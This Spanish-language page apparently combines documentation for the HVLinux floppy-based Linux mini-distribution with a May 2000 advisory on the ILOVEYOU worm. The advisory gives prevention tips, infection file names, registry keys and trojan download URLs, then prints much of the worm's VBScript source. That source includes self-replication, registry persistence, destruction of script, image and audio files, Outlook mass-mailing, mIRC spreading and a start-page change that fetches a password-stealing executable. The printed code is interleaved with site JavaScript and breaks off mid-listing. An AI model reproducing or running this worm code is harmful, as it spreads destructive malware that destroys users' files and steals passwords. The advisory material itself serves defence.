  HVLinux, perspectivas  del proyecto y  demas  detalles acerca HVLinux.
  Este    documento    se    actualizara   y   estara    disponible   en
  http://hvlinux.tsx.org o en http://www.hven.com.ve/linux/hvlinux/docs.

  Sitio Oficial de HVLinux : http://www.hvlinux.tsx.org
  Grupo de discusion       : 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
  Subscripciones           : 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

  Grupo de Desarrolladores: 
  
  Wenceslao (DoctorX) <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
  Kliber    (Kliber)  <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
  Victor    (Supreme) <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
  Koshrf    (Khosrf)  <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
  Tito      (Tito_C)  <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 > 

        2.1 HVLinux

  HVLinux es  una mini-distribucion  de  Linux creada por miembros de la
  cyber  comunidad  Hackers  Venezuela  con  la  ayuda y aporte de otros
  amigos de Internet.

  Esta distribucion nace por la necesidad de ejecutar linux en  maquinas
  sin CD y en maquinas que no eran de mi propiedad (DX)  pero luego este
  proyecto  comenzo a  crecer y a  alimentarse  de  otras  inquietudes y
  necesidades, como lo es el tener una distribucion  de linux venezolana
  porque no? si otros paises tienen sus propias distribuciones Venezuela
  no podia ser la excepcion. Esto  impulso el  trabajo de los fundadores
  del proyecto  que se inicio en  la ciudad  de Valencia estado Carabobo
  (Donde nacio HVLinux !!!!!!!!). 

  HVLinux  esta  basado  en  Linux  Slackware, y  trata  de mantener los
  estandares en cuanto a funcionamiento y sistema de archivos utilizados
  en slackware, contando con la adicion de nuevos programas  creados por
  colaboradores  del  proyecto  y  orientado  a servidores  tratando  de
  ajustarse a nuestras necesidades.

  HVLinux  posee  un  grupo de aplicaciones de seguridad de redes que no
  pueden faltar en ninguna distribucion para poder servir de herramienta
  de auditoria de seguridad.

  Por el momento HVLinux se ejecuta en Memoria RAM, pero pronto sera una
  distribucion con capacidad de ser ejecutada desde el  disco duro desde
  un sistema de archivos ext2 o del tipo umsdos.

        2.2 Filosofia del Proyecto

  La  intencion  de  este  proyecto  es crear una  distribucion de linux
  venezolana, que  cumpla  con nuestras  necesidades. Por ahora  estamos
  orientando nuestro esfuerzo a la parte de servidores pero pronto  (eso
  espero) comenzaremos a trabajar en la parte de estacion de trabajo. No
  queremos inventar la rueda, en  internet existe mucho software GNU que
  podemos  utilizar  la  intencion  es  integrar  las  herramientas  que
  necesitamos.

        2.3 Versiones Disponibles 

  Existen 2 versiones de HVLinux en internet la 0.2.1 y la 0.2.2 con las
  siguientes caracteristicas:

  0.2.1

  - Kernel 2.2.6
  - soporte ne2000,ne2000-pci 
  - libc5
  - soporte PPP
  - servidores de correo sendmail y servidor FTP wuftp.
  - inetd con in.telned
  - herramientas basicas del shell
  - herramientas minimas para navegacion: ftp, telnet, lynx
  - Requerimientos : Procesador x86, 8 megas de memoria RAM, 
    unidad floppy 

  0.2.2 

  - Kernel 2.2.13
  - soporte ne2000,ne2000-pci,kinstong fast ethernet incluido en kernel
  - soporte PPP incluido en Kernel
  - glibc2.1
  - las herramientas y servidores se instalan a gusto
    y se pueden bajar del site de HVLinux
  - Requerimientos : Procesador 486 o mayor, unidad de floppy,
    consume 13(incluye 4 megas libres) MB de memoria RAM, con
    4 MB libres para incluir los paquetes precompilados para HVLinux.
  - posibilidad de agregar memoria swap por medio de aswp.

  En  HVLinux 0.2.2 (biohazard)  usted  puede  agregar  los  programas y
  paquetes  que  desee  bajandolos  de la pagina principal del  proyecto
  http://hvlinux.tsx.org o de HVen http://www.hven.com.ve/linux/hvlinux.

        3. Donde Obtener HVLinux

  HVLinux se encuentra disponible en:

          http://www.hven.com.ve/linux/hvlinux
          en http://hvlinux.tsx.org

  Su distribucion es libre y sin costos.

        3.1 Como Realizar Aportes

  HVLinux es un proyecto GNU, y si usted cree que debemos colocar cierta
  aplicacion  o  si  desea que un programa de su  propiedad sea incluido
  puede  notificarlo  a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 , su solicitud  o comentario
  sera  tomado  en  cuenta  siempre  que  se  encuentre  dentro  de  los
  parametros GNU.

        3.2 Reportar Bugs

  Existe  una  lista  de  correo de desarrollo del proyecto, usted puede
  notificar a esta lista o puede enviar un correo a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
  y si tambien puede enviar el Fix sera bienvenido.

        4. Instalacion de HVLinux

  HVLinux  tiene varias  imagenes, una boot y  otra root. La instalacion
  consiste  en  crear  los  discos  boot  y  root de  HVLinux. Existe un
  conjunto  de aplicaciones  precompiladas para funcionar en HVLinux que
  pueden ser agregadas a gusto y bajadas del site de HVLinux.

        4.1 Creacion del Disco BOOT

  El  disco  boot  de  HVLinux  contiene  el  Kernel  que  utilizara  la
  distribucion y en  nuestro  caso  el  disco boot se llama  hvboot.img,
  hvscsi.img y hvbnet.img.

hvboot.img : es un kernel IDE
hvscsi.img : es un kernel SCSI
             
  Para crear el disco boot podemos seguir 2 procedimientos:

  Linux:

#dd if=[imagen boot].img of=/dev/fd0

  DOS y WIN9X:

c:\>rawrite [enter]  este programa solicitara imagen y disco a utilizar.

  Es recomendable que la imagen y el programa  rawrite esten en el mismo
  directorio. Para  obtener  mayor informacion  sobre el uso del rawrite
  ejecute  "c:\>rawrite -h".  Es  importante  notar  que  debe  tener el
  rawrite en su maquina, puede bajarlo de
  http://www.hven.com.ve/linux/hvlinux/dosutils

  Particularmente yo lo he utilizado de esta forma:

c:\>rawrite hvboot.img a:
 
        4.2 Creacion del disco ROOT

  La creacion  del disco  root es similar a la  creacion del disco boot,
  pero con la  diferencia de que  la imagen root es  una sola y se llama
  hvroot.gz.

  Linux:

#dd if=hvroot.gz of=/dev/fd0

  DOS y WIN 9X :

c:\>rawrite hvroot.gz a:

        4.3 Agregar Programas o Paquetes

  Lo primero  que  tiene que  hacer es bajar los programas precompilados
  para  HVLinux  desde  http://www.hven.com.ve/linux/hvlinux/version/pkg
  donde  "version"  es  simplemente  la version  de HVLinux para la cual
  desea bajar los paquetes.

  Si usted ya tiene los programas que desea agregar entonces puede hacer
  lo siguiente:

#mount -t vfat /dev/fd0 /mnt [ floppy  con formato winDOS]
#mount -t ext2 /dev/fd0 /mnt [ floppy de linux ]

  Si los programas los tiene en un disco duro o en un CD:

#mount -t vfat /dev/hd[a-c][1-5] /mnt [ disco duro IDE, particion WIN ]
#mount -t ext2 /dev/hd[a-c][1-5] /mnt [ disco duro IDE, particion Linux ]

  Una vez montado el medio desde donde se va a instalar los programas

# cd /mnt
#tar zxvf nuevo_programa.tgz 
#./install.sh

        5. Hacking HVLinux

  Es muy posible  que usted desee adaptar HVLinux a sus muy particulares
  necesidades  o desee  incluir  software  que no  ha  sido oficialmente
  colocado en  site para  correr en  HVLinux. Si  usted  es una  de esas
  personas  que desea  hacer  esto mas personal  entonces  estos son los
  pasos a seguir:

  1.- Baje la imagen ROOT.

  2.- Baje la fuente del programa que desea agregar o el binario.

  3.- Si bajo las fuentes del programa compile el mismo y si no averige
      que librerias necesita.

  4.- Siempre  debe  estar  trabajando desde una maquina con linux, para
      saber que librerias necesita agregar utilice el comando "ldd" ejm: 
   
hellstar:~# ldd /usr/bin/wget
            libc.so.6 => /lib/libc.so.6 (0x40019000)
            /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

      esto  indica que el programa wget necesita las librerias libc.so.6
      y ld-linux.so.2 en el directorio /lib.

  5.- Verificar que las librerias no existen en HVLinux

#gzip -d hvroot.gz
#mount -t ext2 -o loop hvroot /mnt
#cd /mnt
#ls /lib

      Si no encuentra las librerias entonces debe agregarlas
 
  6.- Se puede dar cuenta si utiliza "df" que no hay mucho donde agregar
      en el  disco root  por eso se puede valer de una ma~a para agregar
      sus librerias.ejm:

#mkdir nuevo_programa
#cd nuevo_programa
#mkdir usr
#cd usr
#mkdir bin

      copie los binarios necesarios en bin
   
#mkdir lib

      copie las librerias que necesita en lib
   
#mkdir doc

      copie documentacion si la requiere
      puede crear el etc si lo necesita

#cd ..
#tar zcvf nuevo_programa.tgz usr
   
  Ahora cree un script de instalacion: 
  ----------------- install.sh -------------------
  #!/bin/bash
  #
  # HVLinux v0.2.2 (biohazard)
  # por DoctorX <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
  # Script de Instalacion de nuevo_programa
  #
  #
  tar -C / -zxvf nuevo_programa.tgz
  # se crean todos los links necesarios
  ln -s /usr/lib/libloquesea.so.2 /lib/libloquesea.so.2
  ln -s /usr/lib/libhacking.so.5.0  /lib/libhacking.so.5.0
  echo "nuevo_programa version X instalado !!! "
  ---------------------------------------------------
  #chmod +x install.sh
 
  Luego se crea un tgz asi:

  tar zcvf nuevo_programa_version.tgz install.sh nuevo_programa.tgz
   
  Cuando se ejecute  HVLinux usted  puede instalar  su programa para que
  sea ejecutado.


   ͻ
͹ (INFO) ILOVEYOU ͹DoctorX
   ͼ

(INFO) ILOVEYOU
DoctorX <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
http://www.hven.com.ve
http://labx.tsx.org
FECHA: 16/05/2000

  Saludos, bueno jejeje este amigo (EL VIRUS) que anda haciendo algo  de
  estragos en  la red jejejeje tambien  tiene  remedio, existen  algunas
  formas  de evitar  ser su victima y otras formas de asumir que ya eres
  una victima y tratar de evitar seguir siendo  el portador y agente  de
  infeccion :-P. El virus ILOVEYOU  es  un  virus  hecho  para  infectar
  maquinas  ejecutando el  sistema  operativo Windows y que se propaga a
  traves  de la  RED  infectando  archivos  compartidos,  por  medio  de
  archivos adjuntos en emails con extension .VBS o por medio  de DCC  en
  el IRC alterando  luego el  archivo .ini del mIRC. El  motivo  de este
  peque~o  documento  es  informar sobre este  virus y  como  prevenir o
  desinfectarse.

        Como Evitarlo:

  1. Si  eres  administrador  de una RED puedes  evitar  el download del
     archivo  WINS-BUGFIX.exe a traves  de el  HTTP-Proxy  de tu RED, el
     WINS-BUGFIX.exe envia por correo todas las claves que se encuentren
     en el cache de tu PC a la direccion 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

  2. Evitar abrir cualquier  archivo que se  encuentre en attachment que
     sea extension de visual basic o .VBS

  3. No acepte  DCC en  el IRC de ningun  extra~o a menos  que sepas que
     estas recibiendo.

  4. En  un  servidor  de  correo  usted  puede  utilizar  filtros  para
     extensiones de Visual Basic, estos filtros pueden ser  adaptados de
     los utilzados contra el Melissa.

  5. Puede   filtrar  todos  los  emails  con  destino  a  la  direccion
     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

  6. Evite compartir archivos en redes windows con permisos de lectura y
     escritura.

  7. La ultima es  Evite el uso  de Windows y sus Derivados :-P  utilice
     LINUX.

  Algunos sitios de donde bajar actualizaciones para los Antivirus, para
  desinfectarte o para prevenir ser infectado:

NAI: http://download.mcafee.com/extrafiles/love-4.zip
Datafellows: http://www.datafellows.com/download-purchase/updates.html
TrendMicro: http://www.antivirus.com/download/pattern.asp
Sophos: http://www.sophos.com/downloads/ide/index.html#loveleta

  Si estas Infectado:

  Una vez  que el virus infecta  su maquina se aloja bajo los siguientes
  nombres:

  Directorio    Nombre
  ==========    ======
  system        MSKernel32.vbs
  system        LOVE-LETTER-FOR-YOU.TXT.vbs
  windows       Win32DLL.vbs

  Ademas de esto el virus agrega nuevas entradas al registro  de windows
  para ejecutar sus programas en el arranque:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

  Y como  si  esto es  poco se  cambia la  pagina de inicio del internet
  explorer  a  cualquiera  de las  siguientes  direcciones para bajar el
  binario del programa WINS-BUGFIX.exe:

http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrds
fmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe

http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe5467863
24hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe

http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER
67b3Vbvg/WIN-BUGSFIX.exe

http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwer
asdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe

  Una vez  que se descarga  el binario  entonces  se cambia la pagina de
  inicio a una pagina en blanco para despistar.

  Si usted  posee  el mIRC  el  virus  altera  el  script.ini  para  que
  automaticamente  enviar  por DCC el  archivo LOVE-LETTER-FOR-YOU.HTM a
  cada usuario que entre al canal en el que se encuentra el infectado.

  Codigo Fuente del virus (HTML, Sacado de cierto canal de DALnet jeje ):

<-- LOVE-LETTER-FOR-YOU.HTM -->

LOVELETTER - HTML




This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press 'YES' button to Enable ActiveX


----------z--------------------z---------- 


Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   /  @GRAMMERSoft Group  /  Manila,Philippines"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow"&vbcrlf& _
"eq=]-]]-]"&vbcrlf& _
"ctr=0"&vbcrlf& _
"Set fso = CreateObject(]-]Scripting.FileSystemObject]-])"&vbcrlf& _
"set file = fso.OpenTextFile(WScript.ScriptFullname,1)"&vbcrlf& _
"vbscopy=file.ReadAll"&vbcrlf& _
"main()"&vbcrlf& _
"sub main()"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim wscr,rr"&vbcrlf& _
"set wscr=CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"rr=wscr.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Windows Scripting Host%-%Settings%-%Timeout]-])"&vbcrlf& _
"if (rr>=1) then"&vbcrlf& _
"wscr.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Windows Scripting Host%-%Settings%-%Timeout]-],0,]-]REG_DWORD]-]"&vbcrlf& _
"end if"&vbcrlf& _
"Set dirwin = fso.GetSpecialFolder(0)"&vbcrlf& _
"Set dirsystem = fso.GetSpecialFolder(1)"&vbcrlf& _
"Set dirtemp = fso.GetSpecialFolder(2)"&vbcrlf& _
"Set c = fso.GetFile(WScript.ScriptFullName)"&vbcrlf& _
"c.Copy(dirsystem&]-]%-%MSKernel32.vbs]-])"&vbcrlf& _
"c.Copy(dirwin&]-]%-%Win32DLL.vbs]-])"&vbcrlf& _
"c.Copy(dirsystem&]-]%-%LOVE-LETTER-FOR-YOU.TXT.vbs]-])"&vbcrlf& _
"regruns()"&vbcrlf& _
"html()"&vbcrlf& _
"spreadtoemail()"&vbcrlf& _
"listadriv()"&vbcrlf& _
"end sub"&vbcrlf& _
"sub regruns()"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"Dim num,downread"&vbcrlf& _
"regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%-%CurrentVersion%-%Run%-%MSKernel32]-],dirsystem&]-]%-%MSKernel32.vbs]-]"&vbcrlf& _
"regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%-%CurrentVersion%-%RunServices%-%Win32DLL]-],dirwin&]-]%-%Win32DLL.vbs]-]"&vbcrlf& _
"downread=]-]]-]"&vbcrlf& _
"downread=regget(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Internet Explorer%-%Download Directory]-])"&vbcrlf& _
"if (downread=]-]]-]) then"&vbcrlf& _
"downread=]-]c:%-%]-]"&vbcrlf& _
"end if"&vbcrlf& _
"if (fileexist(dirsystem&]-]%-%WinFAT32.exe]-])=1) then"&vbcrlf& _
"Randomize"&vbcrlf& _
"num = Int((4 * Rnd) + 1)"&vbcrlf& _
"if num = 1 then"&vbcrlf& _
"regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%-%Start Page]-],]-]http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe]-]"&vbcrlf& _
"elseif num = 2 then"&vbcrlf& _
"regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%-%Start Page]-],]-]http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe]-]"&vbcrlf& _
"elseif num = 3 then"&vbcrlf& _
"regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%-%Start Page]-],]-]http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe]-]"&vbcrlf& _
"elseif num = 4 then"&vbcrlf& _
"regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%-%Start Page]-],]-]http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe]-]"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"if (fileexist(downread&]-]%-%WIN-BUGSFIX.exe]-])=0) then"&vbcrlf& _
"regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%-%CurrentVersion%-%Run%-%WIN-BUGSFIX]-],downread&]-]%-%WIN-BUGSFIX.exe]-]"&vbcrlf& _
"regcreate ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Internet Explorer%-%Main%-%Start Page]-],]-]about:blank]-]"&vbcrlf& _
"end if"&vbcrlf& _
"end sub"&vbcrlf& _
"sub listadriv"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"Dim d,dc,s"&vbcrlf& _
"Set dc = fso.Drives"&vbcrlf& _
"For Each d in dc"&vbcrlf& _
"If d.DriveType = 2 or d.DriveType=3 Then"&vbcrlf& _
"folderlist(d.path&]-]%-%]-])"&vbcrlf& _
"end if"&vbcrlf& _
"Next"&vbcrlf& _
"listadriv = s"&vbcrlf& _
"end sub"&vbcrlf& _
"sub infectfiles(folderspec)  "&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim f,f1,fc,ext,ap,mircfname,s,bname,mp3"&vbcrlf& _
"set f = fso.GetFolder(folderspec)"&vbcrlf& _
"set fc = f.Files"&vbcrlf& _
"for each f1 in fc"&vbcrlf& _
"ext=fso.GetExtensionName(f1.path)"&vbcrlf& _
"ext=lcase(ext)"&vbcrlf& _
"s=lcase(f1.name)"&vbcrlf& _
"if (ext=]-]vbs]-]) or (ext=]-]vbe]-]) then"&vbcrlf& _
"set ap=fso.OpenTextFile(f1.path,2,true)"&vbcrlf& _
"ap.write vbscopy"&vbcrlf& _
"ap.close"&vbcrlf& _
"elseif(ext=]-]js]-]) or (ext=]-]jse]-]) or (ext=]-]css]-]) or (ext=]-]wsh]-]) or (ext=]-]sct]-]) or (ext=]-]hta]-]) then"&vbcrlf& _
"set ap=fso.OpenTextFile(f1.path,2,true)"&vbcrlf& _
"ap.write vbscopy"&vbcrlf& _
"ap.close"&vbcrlf& _
"bname=fso.GetBaseName(f1.path)"&vbcrlf& _
"set cop=fso.GetFile(f1.path)"&vbcrlf& _
"cop.copy(folderspec&]-]%-%]-]&bname&]-].vbs]-])"&vbcrlf& _
"fso.DeleteFile(f1.path)"&vbcrlf& _
"elseif(ext=]-]jpg]-]) or (ext=]-]jpeg]-]) then"&vbcrlf& _
"set ap=fso.OpenTextFile(f1.path,2,true)"&vbcrlf& _
"ap.write vbscopy"&vbcrlf& _
"ap.close"&vbcrlf& _
"set cop=fso.GetFile(f1.path)"&vbcrlf& _
"cop.copy(f1.path&]-].vbs]-])"&vbcrlf& _
"fso.DeleteFile(f1.path)"&vbcrlf& _
"elseif(ext=]-]mp3]-]) or (ext=]-]mp2]-]) then"&vbcrlf& _
"set mp3=fso.CreateTextFile(f1.path&]-].vbs]-])"&vbcrlf& _
"mp3.write vbscopy"&vbcrlf& _
"mp3.close"&vbcrlf& _
"set att=fso.GetFile(f1.path)"&vbcrlf& _
"att.attributes=att.attributes+2"&vbcrlf& _
"end if"&vbcrlf& _
"if (eq<>folderspec) then"&vbcrlf& _
"if (s=]-]mirc32.exe]-]) or (s=]-]mlink32.exe]-]) or (s=]-]mirc.ini]-]) or (s=]-]script.ini]-]) or (s=]-]mirc.hlp]-]) then"&vbcrlf& _
"set scriptini=fso.CreateTextFile(folderspec&]-]%-%script.ini]-])"&vbcrlf& _
"scriptini.WriteLine ]-][script]]-]"&vbcrlf& _
"scriptini.WriteLine ]-];mIRC Script]-]"&vbcrlf& _
"scriptini.WriteLine ]-];  Please dont edit this script... mIRC will corrupt, if mIRC will]-]"&vbcrlf& _
"scriptini.WriteLine ]-]     corrupt... WINDOWS will affect and will not run correctly. thanks]-]"&vbcrlf& _
"scriptini.WriteLine ]-];]-]"&vbcrlf& _
"scriptini.WriteLine ]-];Khaled Mardam-Bey]-]"&vbcrlf& _
"scriptini.WriteLine ]-];http://www.mirc.com]-]"&vbcrlf& _
"scriptini.WriteLine ]-];]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n0=on 1:JOIN:#:{]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n1=  /if ( $nick == $me ) { halt }]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n2=  /.dcc send $nick ]-]&dirsystem&]-]%-%LOVE-LETTER-FOR-YOU.HTM]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n3=}]-]"&vbcrlf& _
"scriptini.close"&vbcrlf& _
"eq=folderspec"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"next  "&vbcrlf& _
"end sub"&vbcrlf& _
"sub folderlist(folderspec)  "&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim f,f1,sf"&vbcrlf& _
"set f = fso.GetFolder(folderspec)  "&vbcrlf& _
"set sf = f.SubFolders"&vbcrlf& _
"for each f1 in sf"&vbcrlf& _
"infectfiles(f1.path)"&vbcrlf& _
"folderlist(f1.path)"&vbcrlf& _
"next  "&vbcrlf& _
"end sub"&vbcrlf& _
"sub regcreate(regkey,regvalue)"&vbcrlf& _
"Set regedit = CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"regedit.RegWrite regkey,regvalue"&vbcrlf& _
"end sub"&vbcrlf& _
"function regget(value)"&vbcrlf& _
"Set regedit = CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"regget=regedit.RegRead(value)"&vbcrlf& _
"end function"&vbcrlf& _
"function fileexist(filespec)"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim msg"&vbcrlf& _
"if (fso.FileExists(filespec)) Then"&vbcrlf& _
"msg = 0"&vbcrlf& _
"else"&vbcrlf& _
"msg = 1"&vbcrlf& _
"end if"&vbcrlf& _
"fileexist = msg"&vbcrlf& _
"end function"&vbcrlf& _
"function folderexist(folderspec)"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim msg"&vbcrlf& _
"if (fso.GetFolderExists(folderspec)) then"&vbcrlf& _
"msg = 0"&vbcrlf& _
"else"&vbcrlf& _
"msg = 1"&vbcrlf& _
"end if"&vbcrlf& _
"fileexist = msg"&vbcrlf& _
"end function"&vbcrlf& _
"sub spreadtoemail()"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad"&vbcrlf& _
"set regedit=CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"set out=WScript.CreateObject(]-]Outlook.Application]-])"&vbcrlf& _
"set mapi=out.GetNameSpace(]-]MAPI]-])"&vbcrlf& _
"for ctrlists=1 to mapi.AddressLists.Count"&vbcrlf& _
"set a=mapi.AddressLists(ctrlists)"&vbcrlf& _
"x=1"&vbcrlf& _
"regv=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&a)"&vbcrlf& _
"if (regv=]-]]-]) then"&vbcrlf& _
"regv=1"&vbcrlf& _
"end if"&vbcrlf& _
"if (int(a.AddressEntries.Count)>int(regv)) then"&vbcrlf& _
"for ctrentries=1 to a.AddressEntries.Count"&vbcrlf& _
"malead=a.AddressEntries(x)"&vbcrlf& _
"regad=]-]]-]"&vbcrlf& _
"regad=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&malead)"&vbcrlf& _
"if (regad=]-]]-]) then"&vbcrlf& _
"set male=out.CreateItem(0)"&vbcrlf& _
"male.Recipients.Add(malead)"&vbcrlf& _
"male.Subject = ]-]ILOVEYOU]-]"&vbcrlf& _
"male.Body = vbcrlf&]-]kindly check the attached LOVELETTER coming from me.]-]"&vbcrlf& _
"male.Attachments.Add(dirsystem&]-]%-%LOVE-LETTER-FOR-YOU.TXT.vbs]-])"&vbcrlf& _
"male.Send"&vbcrlf& _
"regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&malead,1,]-]REG_DWORD]-]"&vbcrlf& _
"end if"&vbcrlf& _
"x=x+1"&vbcrlf& _
"next"&vbcrlf& _
"regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&a,a.AddressEntries.Count"&vbcrlf& _
"else"&vbcrlf& _
"regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&a,a.AddressEntries.Count"&vbcrlf& _
"end if"&vbcrlf& _
"next"&vbcrlf& _
"Set out=Nothing"&vbcrlf& _
"Set mapi=Nothing"&vbcrlf& _
"end sub"&vbcrlf& _
"sub html"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6"&vbcrlf& _
"dta1=]-]LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? 
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy67916 = 'ispyder' + '@';
 addy67916 = addy67916 + 'mail' + '.' + 'com';
 document.write( '<a ' + path + '\'' + prefix + addy67916 + suffix + '\'' + attribs + '>' );
 document.write( addy67916 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script> ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?HEAD><BODY ONMOUSEOUT=@
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy91508 = '-' + '@';
 addy91508 = addy91508 + 'window' + '.' + 'name';
 document.write( '<a ' + path + '\'' + prefix + addy91508 + suffix + '\'' + attribs + '>' );
 document.write( addy91508 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ ]-]&vbcrlf& _"&vbcrlf& _
"]-]ONKEYDOWN=@
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy77444 = '-' + '@';
 addy77444 = addy77444 + 'window' + '.' + 'name';
 document.write( '<a ' + path + '\'' + prefix + addy77444 + suffix + '\'' + attribs + '>' );
 document.write( addy77444 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>]-]&vbcrlf& _"&vbcrlf& _
